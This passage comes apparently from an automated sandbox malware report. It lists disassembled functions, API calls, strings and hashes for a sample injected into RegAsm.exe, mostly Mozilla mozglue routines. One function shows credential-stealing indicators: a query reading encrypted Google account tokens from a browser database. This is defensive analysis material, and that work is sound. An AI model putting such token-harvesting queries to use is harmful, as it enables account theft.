                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 956590011-0
                                                                                                                                                                                                                                                    • Opcode ID: da68a3fc2ef4e0647a1eb4725328fbd05a9bdf40a45cb5f19ebcd6a3715455f4
                                                                                                                                                                                                                                                    • Instruction ID: ebba2a1b8b0b5051d6e8d0b45f038cc98f51c8d6979266e1dbdc0f91df11236e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da68a3fc2ef4e0647a1eb4725328fbd05a9bdf40a45cb5f19ebcd6a3715455f4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4771D0B0909B418BC712CF18C58055BF7F5FFA9314B44962DE89A5BB02EB30E886CBC5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C72DDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,00000000,?,6C71DEFD), ref: 6C72DDCF
                                                                                                                                                                                                                                                      • Part of subcall function 6C70FA00: ReleaseSRWLockExclusive.KERNEL32(?,?,6C6E5407), ref: 6C70FA4B
                                                                                                                                                                                                                                                      • Part of subcall function 6C7290E0: free.MOZGLUE(00000000,00000000,00000000,?,6C72B6F6,?,?,?,?,?,6C72B127), ref: 6C7290FF
                                                                                                                                                                                                                                                      • Part of subcall function 6C7290E0: free.MOZGLUE(?,00000000,00000000,?,6C72B6F6,?,?,?,?,?,6C72B127), ref: 6C729108
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,?,6C71DEFD), ref: 6C72DE0D
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000,?,?,00000000,00000000,?,6C71DEFD), ref: 6C72DE41
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,?,6C71DEFD), ref: 6C72DE5F
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,?,6C71DEFD), ref: 6C72DEA3
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,?,6C71DEFD), ref: 6C72DEE9
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C71DEFD), ref: 6C72DF32
                                                                                                                                                                                                                                                      • Part of subcall function 6C72DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?,?,00000000,?,?,?,6C72DF7F,?,?,00000000,00000000,?,6C71DEFD), ref: 6C72DB86
                                                                                                                                                                                                                                                      • Part of subcall function 6C72DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?,?,?,?,00000000,?,?,?,6C72DF7F,?,?,00000000,00000000), ref: 6C72DC0E
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C71DEFD), ref: 6C72DF65
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,00000000,00000000,?,6C71DEFD), ref: 6C72DF80
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C6F5EDB
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: memset.VCRUNTIME140(ewsl,000000E5,?), ref: 6C6F5F27
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C6F5FB2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 112305417-0
                                                                                                                                                                                                                                                    • Opcode ID: e2eb4cac6c4c6356f11889449b155620c8d435e45f321274c51144993f39fccc
                                                                                                                                                                                                                                                    • Instruction ID: 73c77d3dec42516f5e0bf63c27202cb6f4a3159c4ffa9735b4e7e587540fc8ff
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2eb4cac6c4c6356f11889449b155620c8d435e45f321274c51144993f39fccc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1351EE72A016019BD7209B28CA847EE7377BFB5308F95012CD45A53B01DB35F91AC79E
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C735D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C735C8C,?,6C70E829), ref: 6C735D32
                                                                                                                                                                                                                                                    • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C735C8C,?,6C70E829), ref: 6C735D62
                                                                                                                                                                                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C735C8C,?,6C70E829), ref: 6C735D6D
                                                                                                                                                                                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C735C8C,?,6C70E829), ref: 6C735D84
                                                                                                                                                                                                                                                    • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C735C8C,?,6C70E829), ref: 6C735DA4
                                                                                                                                                                                                                                                    • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C735C8C,?,6C70E829), ref: 6C735DC9
                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 6C735DDB
                                                                                                                                                                                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C735C8C,?,6C70E829), ref: 6C735E00
                                                                                                                                                                                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C735C8C,?,6C70E829), ref: 6C735E45
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2325513730-0
                                                                                                                                                                                                                                                    • Opcode ID: fdac3c785a44bc07bd16e66ac469f7130cc878201300b848fe2ae69edc233c5e
                                                                                                                                                                                                                                                    • Instruction ID: 0481246e462ac98add646f4445e968d07a61393c6111a1faad7b8ecc2e8a8228
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fdac3c785a44bc07bd16e66ac469f7130cc878201300b848fe2ae69edc233c5e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13416870B003159FCB00DF65D9D9AAE77B9AF89318F544078E50A9B782EB35A805CB61
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C70CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C6D31A7), ref: 6C70CDDD
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                    • API String ID: 4275171209-2186867486
                                                                                                                                                                                                                                                    • Opcode ID: 5af3c448011d9c9e25d139491d94dfcc69d47d3d19bddc9809a3940254eff153
                                                                                                                                                                                                                                                    • Instruction ID: 3fb9853082adb8e97c9ef7486d6ccaacbf9e8d6e4800a564f480425dbe6e18db
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5af3c448011d9c9e25d139491d94dfcc69d47d3d19bddc9809a3940254eff153
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F631A7B17402095BFF10AFA58E45BAE7BB9AB41719F744428F610EBAC0DF71E50087B2
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6DECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DF100: LoadLibraryW.KERNEL32(shell32,?,6C74D020), ref: 6C6DF122
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C6DF132
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000012), ref: 6C6DED50
                                                                                                                                                                                                                                                    • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6DEDAC
                                                                                                                                                                                                                                                    • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C6DEDCC
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32 ref: 6C6DEE08
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C6DEE27
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C6DEE32
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C6DEBB5
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C70D7F3), ref: 6C6DEBC3
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C70D7F3), ref: 6C6DEBD6
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C6DEDC1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                                                                                                                                                                    • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                                                                                                                                                                    • API String ID: 1980384892-344433685
                                                                                                                                                                                                                                                    • Opcode ID: 3cc81d15abcbdd1ccbaf4dedfb092ba7a6339506ca902511eb799f041bc01aed
                                                                                                                                                                                                                                                    • Instruction ID: 3fa3afce1dca83340e346515ab7f59cd5aec37603700634a741b3afd7a1853b1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3cc81d15abcbdd1ccbaf4dedfb092ba7a6339506ca902511eb799f041bc01aed
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4851DF71D052098BDB00DF68C9446EEF7F1AF5A318F45842DE8556B780EB30B949C7EA
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C74A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C74A565
                                                                                                                                                                                                                                                      • Part of subcall function 6C74A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C74A4BE
                                                                                                                                                                                                                                                      • Part of subcall function 6C74A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C74A4D6
                                                                                                                                                                                                                                                    • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C74A65B
                                                                                                                                                                                                                                                    • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C74A6B6
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                                                                                                                                                                                                    • String ID: 0$z
                                                                                                                                                                                                                                                    • API String ID: 310210123-2584888582
                                                                                                                                                                                                                                                    • Opcode ID: d5e99468fbcc1ac6dc5490df98da2361582c791597010a04e06caec1f8cf0ae8
                                                                                                                                                                                                                                                    • Instruction ID: babbcfdeb81156563db7a4050574b39d0d8cf314be72d1076f2363646bbb1ff6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5e99468fbcc1ac6dc5490df98da2361582c791597010a04e06caec1f8cf0ae8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C411575A087459FC341DF28C580A9ABBE5BF89354F508A3EF49987650EB30E649CB83
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00408CA0 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 337stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 00406FF0: memcmp.MSVCRT ref: 0040702B
                                                                                                                                                                                                                                                      • Part of subcall function 00406FF0: memset.MSVCRT ref: 00407059
                                                                                                                                                                                                                                                      • Part of subcall function 00406FF0: LocalAlloc.KERNEL32(00000040,?), ref: 00407090
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00408EF5
                                                                                                                                                                                                                                                      • Part of subcall function 00411590: LocalAlloc.KERNEL32(00000040,00413AC1,?,00000001,00000004,?,00413AC0,00000000,00000000), ref: 004115AC
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 00408F1B
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00409004
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00409018
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                                                                                                                                                                    • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                                                                                    • API String ID: 2910778473-1713091031
                                                                                                                                                                                                                                                    • Opcode ID: 3ee974a32b37156a9f8841d3e1b63e825cf8c5b8b02bdbed852a36196384320f
                                                                                                                                                                                                                                                    • Instruction ID: 21243a70f2b7499751e80cafd4a617e6180d0145fef5e215663dc53dda4f2b83
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ee974a32b37156a9f8841d3e1b63e825cf8c5b8b02bdbed852a36196384320f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ECD18D71804248EACB14EBE4C955AEEBBB8AF24304F54407EE406736D2DB386B0CCB75
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6D78C0 Relevance: 12.3, APIs: 8, Instructions: 320COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,6C75008B), ref: 6C6D7B89
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,6C75008B), ref: 6C6D7BAC
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D78C0: free.MOZGLUE(?,6C75008B), ref: 6C6D7BCF
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,6C75008B), ref: 6C6D7BF2
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C6F5EDB
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: memset.VCRUNTIME140(ewsl,000000E5,?), ref: 6C6F5F27
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C6F5FB2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$CriticalSection$EnterLeavememset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3977402767-0
                                                                                                                                                                                                                                                    • Opcode ID: 7c242392cf13d953167f88b845046c6e81fd48516b0dcf28a158e6ec4621ee38
                                                                                                                                                                                                                                                    • Instruction ID: 2d42863933adea9b553c8e06eaff46c387630db129fd99d1cbce462ee8124d5d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c242392cf13d953167f88b845046c6e81fd48516b0dcf28a158e6ec4621ee38
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66C19631E011188FDB248F28DC90B9DB772AF41318F1642A9D51AA7BC9D731BE858F5A
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C71DF60 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 59threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71DF7D
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71DF8A
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71DFC9
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71DFF7
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71E000
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • <none>, xrefs: 6C71DFD7
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C71E00E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpid
                                                                                                                                                                                                                                                    • String ID: <none>$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                                                                                                                                                                                                    • API String ID: 1430161788-1978395012
                                                                                                                                                                                                                                                    • Opcode ID: 2af500fec09f665fcff4b40214fee8233caf6ff88658cdb1c4a2b916777bb0c9
